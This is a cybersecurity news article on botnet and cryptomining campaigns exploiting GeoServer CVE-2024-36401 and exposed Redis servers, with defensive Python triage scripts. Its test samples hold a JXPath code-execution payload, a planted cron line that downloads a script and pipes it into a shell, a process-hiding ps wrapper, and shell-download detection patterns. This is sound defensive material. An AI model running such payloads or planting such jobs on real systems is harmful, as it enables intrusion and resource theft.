Cybersecurity analysts report that multiple attack campaigns are now exploiting exposed servers and unpatched software flaws. The intrusions have been used to assemble botnets, run covert cryptocurrency mining operations, and repurpose ordinary devices as traffic relays for criminal networks. According to researchers, this wave of activity points to a change in strategy: instead of short bursts of disruption, attackers are concentrating on methods that allow them to stay hidden and draw income over longer periods.
At the center of the warning is CVE-2024-36401, a critical (CVSS 9.8) unauthenticated remote code execution flaw in OSGeo GeoServer. The bug lies in how the bundled GeoTools library evaluates property names taken from OGC requests: they are handed to commons-jxpath, which treats them as XPath expressions and will run extension functions, so an attacker can supply an expression that executes arbitrary code on the server. Fixes shipped in GeoServer 2.23.6, 2.24.4 and 2.25.2; any older build reachable from the internet should be upgraded and checked for post-exploitation artifacts. According to Palo Alto Networks' Unit 42, the flaw has been actively exploited since late last year. Attackers target exposed GeoServer instances and quietly install modified applications and executables that turn the compromised hosts into bandwidth-sharing nodes or residential proxies, a discreet source of passive income for the operators. Instead of deploying noisy malware, these campaigns piggyback on the monetization SDKs that legitimate app developers bundle, which makes the activity far harder to tell apart from benign software.
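Two checks a defender would want after reading the above: is a given GeoServer build on a fixed release line, and do the access logs show property-name parameters carrying JXPath code instead of plain attribute paths? The following is an added example, not GeoServer project code or anything from the Unit 42 report. The fixed-version table comes from the GeoServer advisory; the log lines are constructed, and the log layout (timestamp, client IP, quoted request line) is an assumption about whatever proxy sits in front of GeoServer.

```python
"""Triage helpers for CVE-2024-36401 (GeoServer / GeoTools JXPath RCE).

Added example, not GeoServer project code. The access-log lines are
constructed, and the log layout (timestamp, client IP, quoted request
line) is an assumption about the proxy in front of GeoServer.
"""
import re
from urllib.parse import parse_qs, urlsplit

# First patched patch-level of each affected release line, per the
# GeoServer advisory for CVE-2024-36401.
FIXED_VERSIONS = {(2, 23): 6, (2, 24): 4, (2, 25): 2}


def is_patched(version: str) -> bool:
    """True if a GeoServer version string is at or above the fix for its
    release line. Lines after 2.25 were cut after the fix; lines before
    2.23 never received one."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    parts += [0] * (3 - len(parts))
    major, minor, patch = parts
    line = (major, minor)
    if line in FIXED_VERSIONS:
        return patch >= FIXED_VERSIONS[line]
    return line > (2, 25)


# A legitimate OGC property name is a plain attribute path such as
# "STATE_NAME", "the_geom" or "topp:the_geom/gml:pos". The exploit
# instead supplies a JXPath function call, e.g.
# exec(java.lang.Runtime.getRuntime(),'...'), as shown in the advisory.
SAFE_PROPERTY = re.compile(r"^[A-Za-z_][\w:./@\[\]\-]*$")
JXPATH_CODE = re.compile(r"\(|java\.|getRuntime|\bexec\b", re.IGNORECASE)
PROPERTY_PARAMS = {"valuereference", "propertyname"}


def property_values(url: str) -> list[str]:
    """Every valueReference/propertyName value in a request URL. OGC
    services accept parameter names in any case, so compare lowercased;
    parse_qs already percent-decodes the values."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [v for k, vals in qs.items() if k.lower() in PROPERTY_PARAMS for v in vals]


def flag_request(url: str) -> bool:
    """True when any property expression looks like code rather than an
    attribute path."""
    return any(not SAFE_PROPERTY.match(v) or JXPATH_CODE.search(v)
               for v in property_values(url))


LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<method>\w+) (?P<url>\S+) HTTP')


def scan_log(lines):
    """Return (client IP, URL) for each request that carries a JXPath
    expression in a property-name parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and flag_request(m["url"]):
            hits.append((m["ip"], m["url"]))
    return hits


# Constructed access-log lines: two ordinary WFS queries and one attempt.
SAMPLE_LOG = [
    '2025-09-01T10:00:01Z 203.0.113.5 "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=topp:states&valueReference=STATE_NAME HTTP/1.1" 200',
    '2025-09-01T10:00:02Z 203.0.113.5 "GET /geoserver/wfs?service=WFS&version=1.1.0'
    '&request=GetFeature&typeName=topp:states&propertyName=the_geom HTTP/1.1" 200',
    '2025-09-01T10:00:03Z 198.51.100.23 "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=topp:states'
    '&valueReference=exec(java.lang.Runtime.getRuntime(),%27id%27) HTTP/1.1" 200',
]

if __name__ == "__main__":
    for ip, url in scan_log(SAMPLE_LOG):
        print(f"possible CVE-2024-36401 attempt from {ip}: {url}")
    for v in ("2.25.1", "2.25.2", "2.26.0"):
        print(v, "patched" if is_patched(v) else "VULNERABLE")
```

The allow-list regex is the important part: real property names never contain parentheses, so matching on the shape of a legitimate value catches variants that a blocklist of `exec`/`java.` strings would miss. A version check alone is not proof of safety on a box that was exposed before the upgrade; the log scan is what tells you whether anyone tried.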
Researchers at the internet intelligence company Censys have also identified a botnet known as PolarEdge, which spreads by exploiting long-unpatched flaws in everyday hardware. The network includes tens of thousands of compromised devices, among them routers, security cameras and even enterprise firewalls, with the bulk of infections traced to South Korea, the United States, Hong Kong, Sweden and Canada. Evidence suggests PolarEdge has been active since the middle of last year. Analysts describe it as an operational relay box (ORB) network: hijacked systems forward traffic on behalf of the attackers while continuing to work normally, which makes the activity hard for owners or providers to spot.
Another campaign drawing attention is a modified Mirai botnet strain known as Gayfemboy. It has been observed targeting devices from vendors including Cisco, TP-Link and DrayTek. This version does more than recycle Mirai’s original code. It has been reworked with features that allow it to remain on systems for longer and to sidestep common detection tools. Those changes give it the ability to launch disruptive DDoS attacks while keeping a lower profile than the older strains that defenders are more familiar with.
Investigators have also linked a campaign to a group tracked as TA-NATALSTATUS, which abuses unsecured Redis servers for cryptocurrency mining. The attackers scan for Redis instances reachable on their default port without authentication, then use the server's own configuration commands to point its dump file at a cron directory and write a crontab that fetches and runs the miner; no exploit is needed, only an exposed instance. Once inside, they kill competing miners, add firewall rules that block outside connections to the Redis port so nobody else can take the box, and disguise their activity by renaming common system tools so that administrators see nothing unusual when checking processes.
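The Redis abuse above leaves artifacts that are easy to check for, and the conditions it needs are visible in a single config file. The block below is an added example, not code from any of the cited reports: it audits a redis.conf for the weak settings the campaign depends on (shown beside a hardened version), flags a cron file that was written by a Redis SAVE rather than by an administrator, and checks whether a tool such as ps is still a native binary or has been swapped for a script wrapper. All config fragments, cron contents and file headers are constructed for the demonstration.

```python
"""Checks for the exposed-Redis cron-abuse pattern described above.

Added example; it is not code from any of the cited reports. The
redis.conf fragments, cron file contents and binary headers below are
all constructed for the demonstration.
"""
import re


def audit_redis_conf(conf_text: str) -> list[str]:
    """Report the settings an unauthenticated-Redis campaign relies on:
    listening on every interface, protected mode off, no password, and
    CONFIG callable under its default name."""
    settings = {}
    renamed = set()
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments ('#' inside a password would need quoting)
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key == "rename-command":
            renamed.add(value.split()[0].upper())
        else:
            settings[key] = value.strip()
    findings = []
    binds = settings.get("bind", "").split()  # no bind directive means all interfaces
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listens on all interfaces")
    if settings.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode: disabled")
    if not settings.get("requirepass"):
        findings.append("requirepass: no password set")
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG still reachable by its default name")
    return findings


def suspicious_cron(content: bytes) -> list[str]:
    """Flag a cron file that was written by Redis SAVE rather than by an
    administrator. An RDB dump starts with the 'REDIS' magic and carries
    binary framing; cron skips the garbage lines and still runs the
    planted command."""
    reasons = []
    if content.startswith(b"REDIS"):
        reasons.append("starts with Redis RDB magic")
    if b"\x00" in content:
        reasons.append("contains NUL bytes")
    if re.search(rb"(curl|wget)[^\n]*\|\s*(ba)?sh\b", content, re.IGNORECASE):
        reasons.append("downloads and pipes straight into a shell")
    return reasons


def is_replaced_binary(content: bytes) -> bool:
    """True when a file that should be a native executable (ps, top,
    netstat) is actually a script, the usual shape of a wrapper that
    filters the miner out of process listings."""
    return not content.startswith(b"\x7fELF")


# Constructed samples.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass change-me-to-a-long-random-secret
rename-command CONFIG ""
"""

PLANTED_CRON = (
    b"REDIS0011\xfa\tredis-ver\x057.2.4\xfe\x00\xfb\x01\x00\x00\x03key\x1a"
    b"\n\n*/5 * * * * curl -s http://198.51.100.9/x.sh | sh\n\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00"
)
BENIGN_CRON = b"0 3 * * * /usr/local/bin/backup.sh\n"

REAL_PS = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
WRAPPED_PS = b"#!/bin/bash\n/usr/bin/ps.original \"$@\" | grep -v xmrig\n"

if __name__ == "__main__":
    print("weak conf:", audit_redis_conf(WEAK_CONF))
    print("hardened conf:", audit_redis_conf(HARDENED_CONF))
    print("planted cron:", suspicious_cron(PLANTED_CRON))
    print("benign cron:", suspicious_cron(BENIGN_CRON))
    print("ps replaced:", is_replaced_binary(WRAPPED_PS))
```

Run the cron check over /var/spool/cron, /var/spool/cron/crontabs and /etc/cron.d; a dump file dropped there is tolerated by cron because it ignores lines it cannot parse, which is exactly why the trick works. Renaming CONFIG is the classic mitigation; on Redis 6 and later an ACL that denies the `@dangerous` category to application users achieves the same with less breakage. The binary check is deliberately crude: it catches a shell wrapper in place of ps or top, not a trojaned ELF, so compare package checksums (`rpm -V`, `debsums`) as well.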
Security experts say this reflects a broader shift in cybercrime. Instead of aiming for quick disruption, adversaries are embedding themselves inside everyday infrastructure, quietly drawing on bandwidth and processing power for long-term profit. Because the activity blends with routine network traffic, organizations often remain unaware until substantial resources have already been drained. Experts caution that without timely patching and close monitoring, companies risk having their systems silently absorbed into global criminal operations.